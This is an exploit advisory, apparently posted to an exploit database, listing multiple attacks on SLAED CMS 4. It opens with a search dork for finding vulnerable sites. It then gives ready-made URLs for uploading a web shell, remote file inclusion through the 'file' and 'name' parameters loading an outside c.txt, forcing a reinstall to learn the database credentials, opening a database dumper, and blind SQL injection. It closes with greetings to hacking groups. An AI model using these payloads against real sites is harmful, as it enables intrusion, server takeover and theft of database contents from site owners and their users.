======================================================================================== | # Title : Script Slaed Cms 4 Mullti Vulnerability | # Author : indoushka | # email : indoushka@hotmail.com | # Home : www.sec-war.com | # Web Site : | # Dork : Powered by SLAED CMS © 2005-2008 SLAED. All rights reserved. Licensed to w-arab.com © 2010 Creative Studio. All rights reserved. | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | # Bug : Mullti ====================== Exploit By indoushka ================================= # Exploit : 1 - Upload Shell: first Register in to web site http://127.0.0.1/sd/index.php?name=files&op=add (use temper data) secend go to http://127.0.0.1/sd/uploads/files/temp/ 2 find you Ev!l 2 - RFI: http://localhost/sd/index.php?file=http://localhost/c.txt? http://localhost/sd/index.php?name=http://localhost/c.txt? 3 - Reinstall Script : http://127.0.0.1/sd/setup.php?op=language&lang=1 or http://127.0.0.1/sd/install/index.php?op=language&lang=1 4 - Data Base Dumper : First go to http://127.0.0.1/sd/admin.php?op=files&panel=1 put This code javascript:OpenWindow('modules/Dumper/index.php',%20'Dumper',%20'400',%20'350') you know the user and pass from Reinstall script information to login to databass 5 - Blind SQL/XPath injection (I hate SQl *_*) : http://127.0.0.1/sd/index.php?id=1 Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix ========================================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) www.owned-m.com * Stake (www.v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com) www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team) www.hacker.ps * www.no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net www.alkrsan.net * www.kadmiwe.net * www.arhack.net * D4NB4R http://www.ilegalintrusion.net/foro/ --------------------------------------------------------------------------------------------------------------